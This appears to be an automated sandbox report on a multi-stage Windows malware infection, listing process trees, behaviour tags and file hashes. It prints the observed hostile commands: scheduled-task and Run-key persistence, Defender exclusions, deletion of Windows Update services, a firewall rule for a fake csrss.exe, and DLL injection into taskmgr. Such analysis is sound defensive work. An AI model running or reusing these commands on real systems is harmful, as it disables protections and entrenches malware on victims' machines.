100 PID 2704 wrote to memory of 1460 2704 oneetx.exe 100 PID 448 wrote to memory of 3884 448 aafg31.exe 101 PID 448 wrote to memory of 3884 448 aafg31.exe 101 PID 448 wrote to memory of 4484 448 aafg31.exe 102 PID 448 wrote to memory of 4484 448 aafg31.exe 102 PID 2704 wrote to memory of 3840 2704 oneetx.exe 106 PID 2704 wrote to memory of 3840 2704 oneetx.exe 106 PID 2704 wrote to memory of 3840 2704 oneetx.exe 106 PID 3840 wrote to memory of 1832 3840 toolspub2.exe 108 PID 3840 wrote to memory of 1832 3840 toolspub2.exe 108 PID 3840 wrote to memory of 1832 3840 toolspub2.exe 108 PID 3840 wrote to memory of 1832 3840 toolspub2.exe 108 PID 3840 wrote to memory of 1832 3840 toolspub2.exe 108 PID 3840 wrote to memory of 1832 3840 toolspub2.exe 108 PID 2704 wrote to memory of 4924 2704 oneetx.exe 109 PID 2704 wrote to memory of 4924 2704 oneetx.exe 109 PID 2704 wrote to memory of 4924 2704 oneetx.exe 109 PID 4924 wrote to memory of 5076 4924 3eef203fb515bda85f514e168abb5973.exe 116 PID 4924 wrote to memory of 5076 4924 3eef203fb515bda85f514e168abb5973.exe 116 PID 4924 wrote to memory of 5076 4924 3eef203fb515bda85f514e168abb5973.exe 116 PID 1460 wrote to memory of 228 1460 setup.exe 126 PID 1460 wrote to memory of 228 1460 setup.exe 126 PID 1460 wrote to memory of 228 1460 setup.exe 126 PID 228 wrote to memory of 4952 228 cmd.exe 128 PID 228 wrote to memory of 4952 228 cmd.exe 128 PID 228 wrote to memory of 4952 228 cmd.exe 128 PID 1020 wrote to memory of 4588 1020 3eef203fb515bda85f514e168abb5973.exe 133 PID 1020 wrote to memory of 4588 1020 3eef203fb515bda85f514e168abb5973.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\fileexe.exe"C:\Users\Admin\AppData\Local\Temp\fileexe.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\aafg31.exe"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\SYSTEM32\taskkill.exetaskkill /IM chrome.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /IM msedge.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
-
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F5⤵
- Creates scheduled task(s)
PID:2436
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:2124
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"6⤵PID:4608
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E6⤵PID:4612
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"6⤵PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:4092
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E6⤵PID:2540
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 6286⤵
- Program crash
PID:1492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8806⤵
- Program crash
PID:3276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8886⤵
- Program crash
PID:5024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8886⤵
- Program crash
PID:3712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 9126⤵
- Program crash
PID:4268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11046⤵
- Program crash
PID:5052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11046⤵
- Program crash
PID:1376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 14326⤵
- Program crash
PID:1480
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:3732
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:3840
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:2396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:3040
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:4468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵
- Executes dropped EXE
PID:2348
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:4780
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵
- Executes dropped EXE
PID:3404 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:1076
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:3892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe8⤵
- Executes dropped EXE
PID:4912 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f9⤵PID:3156
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f9⤵PID:4360
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:1432
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2560
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:1484
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2692
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4788
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4332
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1760
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4276
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3208
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3260
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3248
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1980
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵PID:3020
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:4748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2268
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:1404
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3884
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1924
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:3840
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4404
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1844
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1708
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1120
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3088
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3776
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1584
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4004
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1536
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4672
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1484
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3480
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4916
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:4976 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:3164
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:2588
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵PID:4016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1460 -ip 14601⤵PID:4720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1460 -ip 14601⤵PID:1676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1460 -ip 14601⤵PID:992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1460 -ip 14601⤵PID:3176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 14601⤵PID:528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 14601⤵PID:2732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1460 -ip 14601⤵PID:3984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 14601⤵PID:1340
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵
- Executes dropped EXE
PID:4968
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3412
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1660
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵
- Executes dropped EXE
PID:2200
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵
- Executes dropped EXE
PID:3912
-
C:\Users\Admin\AppData\Roaming\ugrceeiC:\Users\Admin\AppData\Roaming\ugrceei1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4260 -
C:\Users\Admin\AppData\Roaming\ugrceeiC:\Users\Admin\AppData\Roaming\ugrceei2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:528
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
1KB
MD5a31985d40108935c8ce70896d54528a2
SHA14e3a27b73eaac2d00b533f9c1dbe9f3c28b845c1
SHA256e130df7be2343f0d907d33b797104044d0293d70e5fb05123c8f65a26e22d04b
SHA512242299b8ade43470b64b365ee39bee26397c2b7b0802f0d9123fd681d7d82a1a6dd022e57130d7b0861f4f7b6d6f2f7d8605fdee6e46dc9c35d84dbaaeab2e16
-
Filesize
408KB
MD5a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA2561eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89
-
Filesize
408KB
MD5a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA2561eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89
-
Filesize
408KB
MD5a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA2561eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89
-
Filesize
271KB
MD5a53b97f33623010a204d53ca814e8dd2
SHA11c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA2566ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA5126a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b
-
Filesize
271KB
MD5a53b97f33623010a204d53ca814e8dd2
SHA11c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
